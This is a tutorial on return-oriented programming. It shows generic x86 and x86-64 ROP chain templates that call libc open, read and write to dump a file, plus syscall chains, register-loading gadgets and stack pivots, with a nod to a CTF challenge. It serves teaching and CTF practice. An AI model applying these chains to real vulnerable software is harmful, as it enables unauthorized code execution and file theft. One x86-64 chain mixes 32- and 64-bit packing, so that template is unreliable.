Chaining gadgets to execute code

Creating a ROP chain on x86

Cool, so now we know how to call one libc function, let's call multiple. Let's assume I have a file I want to read the contents of and the name of the file is already within memory. I have full control of the stack and the EIP/RIP. We crafted a stack frame to call system() with the argument '/bin/sh' in the previous section. How do we craft a stack frame that calls open() to open a file descriptor with our target file, read() to read the data within the file into memory, and then write() to write the data to stdout?

Again, we assume that the attacker has used an information leak to expose sensitive information allowing them to discover the base of libc in memory. The attacker also knows the location of the filename_ptr in memory.

Here's an example stack frame to accomplish this in x86:

p32(open_sym)           # address of open() function within libc
p32(pop_pop_pop_ret)    # pop %; pop %; pop %; ret gadget
p32(filename_ptr)       # arg0: pointer to filename string
p32(0x0)                # arg1: O_RDONLY
p32(0x0)                # arg2: 0 for mode
p32(read_sym)           # address of read() function within libc
p32(pop_pop_pop_ret)    # pop %; pop %; pop %; ret gadget
p32(0x3)                # arg0: assume fd of the target is 3
p32(initial)            # arg1: initial data structure in libc (rw-)
p32(1024)               # arg2: num of bytes to read from fd 3
p32(write_sym)          # address of write() function within libc
p32(pop_pop_pop_ret)    # pop %; pop %; pop %; ret gadget
p32(0x1)                # arg0: fd 1 (stdout)
p32(initial)            # arg1: initial data structure with our file content
p32(1024)               # arg2: num of bytes to write to fd 1 (stdout)
p32(exit_sym)           # address of exit() function within libc

So what's happening in this stack frame?

When the attacker overwrites the stack frame of the vulnerable function with the code in this example, the vulnerable function will ret into our first function call: open(). open() is going to use the filename_ptr for its first argument (const char *pathname), 0x0 (O_RDONLY) for its second argument (int flags), and 0x0 for its third argument (mode_t mode).

If the open() function is successful, eax will contain the file descriptor of the now open file pointed to by filename_ptr - in this example we're assuming the file descriptor is 3. Next, we use a pop %; pop %; pop %; ret gadget to pop our arguments to open() off of the stack. The operand for these pop % instructions doesn't really matter, so long as it's not ESP.

The pop %; pop %; pop %; ret gadget will now ret into our read() address on the stack, poping the word off of the stack and executing libc's read() function. read() is going to use 0x3 for its first argument (int fd), initial for its second argument (void* buf), and 1024 for its third argument (size_t count). If the read() function is successful, eax will contain the number of bytes read from the file. We ret into our gadget to pop all of read()'s arguments off the stack, then we ret into our write() call.

write() is going to use 0x1 (stdout) for its first argument (int fd), initial for its second argument (const void *buf), and 1024 for its third argument (size_t count). If the write() function is successful, eax will contain the number of bytes that was written to stdout. We ret into our gadget and pop all of write's arguments off the stack, then we ret into our exit() call.

Can you explain in greater detail why pop %; pop %; ret-esque gadgets are needed for building ROP chains on x86?

If we didn't use a pop %; pop %; pop %; ret gadget to clear our function arguments off of the stack, the stack frame would look something like this:


So what's the problem here?

When open() finishes, we'll ret into our read() call. This isn't going to work out well for us though because read()'s arguments don't make any sense now. Our first argument for read() points to a null byte, which isn't a filename_ptr.

It's necessary for us to use pop %; pop %; pop %; ret gadgets in order to clear the previous function call's arguments from the stack. These gadgets allow us to effectively chain multiple function calls. [1]

Creating a ROP chain on x86-64

Let's do the same open(), read(), write(), exit() ROP chain on x86-64:

p64(pop_rdi_ret)            # load filename_ptr into rdi
p64(filename_ptr)           # arg0: pointer to filename string
p64(pop_rsi_pop_r15_ret)    # load flags into rsi
p64(0x0)                    # arg1: O_RDONLY
p64(0xcafebabe)             # dummy bytes loaded into r15
p64(pop_rdx_ret)            # load mode into rdx
p64(0x0)                    # arg2: 0 for mode
p64(open_sym)               # address of open() function within libc
p64(pop_rdi_ret)            # load fd into rdi
p64(0x3)                    # arg0: assume fd of the target is 3
p64(pop_rsi_pop_r15_ret)    # load initial into rsi
p64(initial)                # arg1: initial data structure in libc (rw-)
p64(0xcafebabe)             # dummy bytes loaded into r15
p64(pop_rdx_ret)            # load num of bytes to read into rdx
p64(1024)                   # arg2: num of bytes to read from fd 3
p64(read_sym)               # address of read() function within libc
p64(pop_rdi_ret)            # load fd 1 (stdout) into rdi
p64(0x1)                    # arg0: fd 1(stdout)
p64(pop_rsi_pop_r15_ret)    # load initial into rsi
p64(initial)                # arg1: initial data structure with file content
p64(0xcafebabe)             # dummy bytes loaded into r15
p64(pop_rdx_ret)            # load num of bytes to write into rdx
p64(1024)                   # arg2: num of bytes to write to fd 1 (stdout)
p64(write_sym)              # address of write() function within libc
p64(exit_sym)               # address of exit() function within libc

So what's happening in this stack frame?

The operations that take place within this stack frame are exactly the same as what took place in the x86 example, we're just using ROP gadgets to ensure that we're following the x86-64 calling convention. Each pop %; ret gadget is poping our arguments from the stack into the correct registers for each libc function call. You can see that not everything is perfect, though. The pop rsi; pop r15; ret gadget is poping a dummy value from the stack into r15. We're not always going to find the perfect gadget to pop % just one value into our target register - we have to make due with what's available.

Creating a ROP chain to execute syscalls on x86 and x86-64

Alright, so now that we understand how to chain gadgets to make multiple libc calls, here are some examples of ROP chains that execute syscalls in x86 and x86-64.

Here's an example ROP chain that executes sys_open(filename_ptr, O_RDONLY, 0) in x86:

p32(pop_ebx_ret)    # load filename_ptr into ebx
p32(filename_ptr)   # arg0: pointer to filename string
p32(pop_ecx_ret)    # load flags into ecx
p32(0x0)            # arg1: O_RDONLY 
p32(pop_edx_ret)    # load mode into edx
p32(0x0)            # arg2: 0 for mode
p32(pop_eax_ret)    # load syscall number into eax
p32(0x5)            # syscall number for sys_open
p32(int_80_ret)     # int 0x80; ret gadget

Here's an example ROP chain that executes sys_open(filename_ptr, O_RDONLY, 0) in x86-64:

p64(pop_rdi_ret)    # load filename_ptr into rdi
p64(filename_ptr)   # arg0: pointer to filename string
p64(pop_rsi_ret)    # load flags into rsi
p64(0x0)            # arg1: O_RDONLY 
p64(pop_rdx_ret)    # load mode into rdx
p32(0x0)            # arg2: 0 for mode
p32(pop_rax_ret)    # load syscall number into rax
p64(0x2)            # syscall number for sys_open
p64(syscall)        # syscall; ret

As you've probably noticed these two ROP chains seem super simple and super similiar, but it won't always be that way. As I said earlier, creating a ROP chain is a test of creativity, and you won't always be able to load your registers with simple pop %; ret gadgets.

How might one combine multiple gadgets into one register-populating pseudo-gadget? What are some useful non-pop instructions for doing this in amd64?

You can definitely find gadgets that will pop all of your necessary arguments into their respective registers. If we found something like: pop rdi; pop rsi; pop rdx; ret in code, we could use this gadget before making our read(), write(), and open() calls. [2]

In x86, there's an interesting instruction called popa/popad that pops data into all general-purpose registers. This is definitely useful if you need to intialize all of your registers prior to executing further code. [3]

So what if I can't find a pop instruction for my target register?

If you can't find a pop instruction to directly load a register, you still might have some options if you use xor and xchg.

The concept in using xor to load a register is as follows [2]:

  1. xor your target register against itself to zero it out.
  2. pop the data you want to load into a different register.
  3. xor your target register against the other register, duplicating the data into your target register.

The concept in using xchg to load a register is as follows [2]:

  1. pop the data you want to load into a different register.
  2. execute an xchg with your target register and the register containing your data.

Using the xchg method will swap the data between the two registers. Ensure you reload the register you used to execute xchg if you intend to use it later.

The mov %, %; ret gadget is also a viable method to load target registers. Generating ROP chains to create exploits is just a test of the exploiter's creativity.

Under what conditions would one need to stack pivot? What are some locations an attacker could store a second-stage chain for use in a stack pivot?

These ROP chains can get pretty long, sometimes we might not be able to write more than a handful of words to the stack. In these conditions, we'll have to conduct a stack pivot.

A stack pivot is a technique that relocates the stack to some other location in memory. This allows us to completely control the contents of the stack, and this is where we can place more words for our ROP chain. When we pivot the stack to our new location, we can continue executing our ROP chain without any of the pesky restrictions we faced on the original stack.

In order to pivot the stack, we pop the location containing the rest of our ROP chain into the ESP/RSP register. Then, when our pop rsp; ret gadget executes ret, the stack will be pointing to the location in memory containing our second stage ROP chain.

An attacker could place a second stage ROP chain in any know read/writeable location in memory. These locations could include the heap, the stack, a buffer in .bss or .data, or (my personal favorite) libc's initial data structure. [2]

I'm not familiar with the initial libc structure, can you explain what it is?

initial is a data section within libc that is read/writeable. If you know the base of libc within memory and you know the version of libc being used by a target program, you can determine the location of libc's initial data structure within memory. It's a useful location to store file data that's been read into memory, or second-stage ROP chains because the data strucuture is usually empty.

The initial data structure is used by the libc function atexit() to store a list of function pointers that will be called when exit() is called. In the Left challenge from 0x00 CTF 2017, the initial data structure plays a role in gaining control of the RIP.

Function pointers within initial are xord with some secret in thread-local storage (TLS) and then rotated left 17 bits. In the Left challenge the attacker needs to expose an entry within initial, derive the secret from the entry, and then replace the entry in initial with a one_gadget. Then, when exit() is called, the one_gadget is executed. This technique was necessary because the target program had Full RELRO protections enabled, preventing the attacker from overwriting a .got.plt entry. [4]

All that being said, yes if you know the location of .data or .bss within the program it's just as easy to write your second-stage ROP chain there. However, if the program has the PIE protection mechanism enabled and you don't feel like deriving the base of the program within memory, initial is another read/writeable location that can be easily derived from the base of libc. Use this location at your own discretion though, especially if some information contained with initial seems important.

